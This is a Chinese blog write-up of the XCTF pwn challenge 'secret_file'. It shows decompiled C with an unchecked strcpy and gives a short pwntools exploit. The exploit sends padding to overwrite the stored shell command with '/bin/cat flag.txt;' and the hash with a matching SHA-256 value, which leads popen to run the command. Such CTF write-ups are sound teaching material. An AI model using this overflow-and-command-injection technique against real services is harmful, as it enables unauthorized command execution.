[XCTF-pwn] 12-secret_file

已于 2022-03-04 11:08:42 修改
阅读量115 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
于 2022-03-03 19:29:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123261845
版权

一个简单的内存溢出覆盖的题,要求输入数据与md5值比较通过,然后执行预存的命令。这里输入数据有溢出,通过溢出覆盖到v14命令和v15的md5值。

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  char *v3; // rax
  unsigned __int8 *v4; // rbp
  char *v5; // rbx
  __int64 v6; // rcx
  char *v7; // rdi
  unsigned int v8; // er12
  FILE *v9; // rbp
  size_t v11; // [rsp+0h] [rbp-308h] BYREF
  char *lineptr; // [rsp+8h] [rbp-300h] BYREF
  char dest[256]; // [rsp+10h] [rbp-2F8h] BYREF
  char v14[27]; // [rsp+110h] [rbp-1F8h] BYREF
  char v15[65]; // [rsp+12Bh] [rbp-1DDh] BYREF
  _BYTE v16[32]; // [rsp+16Ch] [rbp-19Ch] BYREF
  char v17[64]; // [rsp+18Ch] [rbp-17Ch] BYREF
  int v18; // [rsp+1CCh] [rbp-13Ch] BYREF
  char s[264]; // [rsp+1D0h] [rbp-138h] BYREF
  unsigned __int64 v20; // [rsp+2D8h] [rbp-30h]

  v20 = __readfsqword(0x28u);
  sub_E60(dest);
  v11 = 0LL;
  lineptr = 0LL;
  if ( getline(&lineptr, &v11, stdin) == -1 )
    return 1;
  v3 = strrchr(lineptr, 10);                    // dest:256, v14:cmd, v15:md5
  if ( !v3 )
    return 1;
  *v3 = 0;
  v4 = v16;
  v5 = v17;
  strcpy(dest, lineptr);
  sub_DD0(dest, v16, 256LL);
  do
  {
    v6 = *v4;
    v7 = v5;
    v5 += 2;
    ++v4;
    snprintf(v7, 3uLL, "%02x", v6);
  }
  while ( v5 != (char *)&v18 );
  v8 = strcmp(v15, v17);
  if ( v8 )
  {
    puts("wrong password!");
    return 1;
  }
  v9 = popen(v14, "r");
  if ( !v9 )
    return 1;
  while ( fgets(s, 256, v9) )
    printf("%s", s);
  fclose(v9);
  return v8;
}

exp:

from pwn import *

p = remote('111.200.241.244', 50769)

p.sendline(b'A'*256+b'/bin/cat flag.txt;'.ljust(27, b'#') + b'e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb')

p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XCTF-HW-pipeline附件
11-09
附件
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
secret_file(xctf)
weixin_43868725的博客
08-12 293
0x0 程序保护和流程 保护: 流程: main() 程序先在sub_E60()中给v14,v15赋值。 然后接收一行的数据存入lineptr中,将换行符换成\x00后将lineptr中的数据复制到dest中,通过sub_DD0()将dest处前0x100的字符串的sha256的摘要存入v16中。 之后将其转化为十六进制存入v17中,之后与v15中的值进行比较如果正确就执行popen函数参数为v14。 0x1 利用过程 1.通过对流程的分析,在getline对输入没有长度限制,导致了在strcpy函
xctf secret_file
doudoudedi
10-02 344
最近事情有点多我又做不来真是的唉 做到后面有种无力感 ~~ main函数 简而言之就是你输入一串数字sha256与系统的匹配正确也不会怎么样 我虽然我会sha256但是我会栈溢出阿!!! 关键在这里我们将前面的都覆盖然后将加上我们调试而知的正确sha256然后就是命令执行了,清楚的看见参数是在11b的位置 ython -c 'print "A"*0x100+"ls;".ljust(0x1B,...
攻防世界PWNsecret_file题解
seaaseesa的博客
11-10 1898
首先,我们看一下程序的保护机制 吓了一跳,几个关键保护全开。 然后,我们用IDA分析一下 好像很复杂的样子。以往的ROP这些都用不了。然而,只要这个条件成立,就可以执行popen了。 其中,我们发现v15是一个定值,在这里面被初始化,调试后发现是一个字符串9387a00e31e413c55af9c08c69cd119ab4685ef3bc8bcbe1cf82161119457127...
XCTF-高手进阶区:NewsCenter
1stPeak's Blog
06-13 3189
XCTF-高手进阶区:NewsCenter
ADworld pwn wp - secret_file
fa1c4的blog
06-28 108
正文 缺少libc动态链接文件, 搜索一下是openssl的一个开源库, 实现加密算法, 找不到方便的解决方法, 直接连服务器打题 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // e
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
secret_file分析
Eagle_hwei的博客
02-13 950
secret_file的题目分析 2020-02-1309:11:12 by hawkJW 题目附件、ida文件及wp链接   这道题就是一个简单的溢出问题,但是需要注意一些细节,这里进行说明一下   1.  程序流程总览 首先,还是老规矩,看一下保护情况   可以看到,这里的保护措施全开,那么可能不能用普通的操作来解决问题。下面具体看一下程序的流程,如图所示 实际上,可...
[BUUCTF-pwn] [HarekazeCTF2019]Ramen
weixin_52640415的博客
01-12 1029
看exp再慢慢消化。逻辑错造成的指针溢出。 这个题虽然有UAF但是利用起来很困难,本来不想看那么长的程序,没办法看程序再看了exp后才明白。 程序分主程序和order,serv,change 三个函数,主程序没啥内容,但是循环队列的指针v4放在这了。v4依次表示队列块指针,头id,尾id和总长度。 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int v3; // eax char v4[24]; //
HITCON 2014 pwn - stkof 做题笔记
fa1c4的blog
08-30 449
前言 一道unlink + off-by-one, ctfhub 搜 stkof 分析过程 __int64 __fastcall main(int a1, char **a2, char **a3) { int v3; // eax int v5; // [rsp+Ch] [rbp-74h] char nptr[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v7; // [rsp+78h] [rbp-8h] v7 = __re
三个pwn
weixin_52640415的博客
06-28 1672
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
国赛your_pwn,PIE保护
playmaker的博客
05-13 1876
题目主要代码如下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char s; // [rsp+0h] [rbp-110h] unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); setbuf(stdout, 0LL);...
[BMZCTF-pwn] 20-secret_file
weixin_52640415的博客
02-15 2809
栈内溢出的题 读完程序也就完事了 __int64 __fastcall main(int a1, char **a2, char **a3) { char *v3; // rax unsigned __int8 *v4; // rbp char *v5; // rbx __int64 v6; // rcx char *v7; // rdi unsigned int v8; // er12 FILE *v9; // rbp size_t v11; // [rsp+0h]
攻防世界第一二三题
qq_25044201的博客
12-18 189
这是第一题 确实运行就可以获得flag 第二题 下载文件然后放在虚拟机中,分析file 然后放ida 64位分析 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax char v4; // [rsp+0h] [rbp-20h] unsigned int v5; // [rsp+8h] [rbp-18h] unsigned __int64 v6; // [rsp+18h..
pwn学习-攻防世界新手区
qq_45653588的博客
12-20 1377
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
栈溢出技巧-下
蚁景网安学院
04-07 691
●栈溢出技巧-上●栈溢出技巧-中根据前面的内容可以知道在开启ASLR+PIE的后,每次加载的地址是在一定的范围随机变化的,只不过由于内存页为0x1000空间大小的限制和加载后相对偏移不会变...
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值